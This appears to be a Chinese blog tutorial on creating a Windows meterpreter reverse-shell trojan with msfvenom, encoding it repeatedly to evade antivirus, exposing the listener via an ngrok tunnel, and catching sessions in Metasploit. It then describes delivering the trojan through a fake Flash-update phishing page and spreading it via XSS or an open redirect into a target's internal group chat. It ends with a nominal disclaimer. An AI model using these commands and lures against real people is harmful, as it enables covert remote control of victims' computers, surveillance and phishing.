条件

  1. 一个外网服务器(这里用免费的ngrok)
  2. Metasploit(生成木马)
  3. Kali(映射端口)

工具下载

ngrok下载地址

https://www.ngrok.cc/#down-client

生成木马开始

1、在ngrok官网上注册一个用户然后登陆,选择一个免费/付费隧道,然后选择tcp协议

photo_2019-12-14_09-59-01.jpg-54.8kB

2、然后打开sunny(在工具下载那里)

kali下输入

1
./sunny clientid 隧道id

然后是这样的

1.jpg-35.5kB

打马赛克部分是我的外网的监听服务器

3、生成木马

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.241 LPORT=6 -f exe -i 12 > Fuck.exe
  • -p:选择攻击的payload
  • LHOST:监听的本地IP
  • LPORT:监听的本地端口
  • -f:表示为exe程序
  • -i:重复编码12次(听说有助于免杀)

然后就会生成一个Fuck.exe的文件

2.png-11.1kB

4、使用msf监听

1
msf5 > use exploit/multi/handler
2
msf5 exploit(multi/handler) > set payloads windows/meterpreter/reverset_tcp
3
payloads => windows/meterpreter/reverset_tcp
4
msf5 exploit(multi/handler) > set lhost 192.168.31.241
5
lhost => 192.168.31.241
6
msf5 exploit(multi/handler) > set lport 6
7
lport => 6
8
msf5 exploit(multi/handler) > exploit

3.png-213.5kB

然后在window下打开Fuck.exe后,Kali会返回如下界面(meterpreter

3.jpg-110kB

这个时候已经可以监控打开这个exe文件的电脑了。

Flash钓鱼

钓鱼页面下载页:
https://github.com/r00tSe7en/Fake-flash.cn

打开index.html,修改如下为你木马的下载地址

2.jpg-114.1kB

然后打开页面点击就会跳转到https://www.xxxxxxxxxxxxxx.cn/

4.png-158.8kB

利用条件可以如下:

  1. xss打不到cookie的时候,可以填写跳转到这里。
  2. 收集信息到位,挖到一个url跳转,然后丢到他们内部群里。

以上条件纯属虚构,如违法立删… …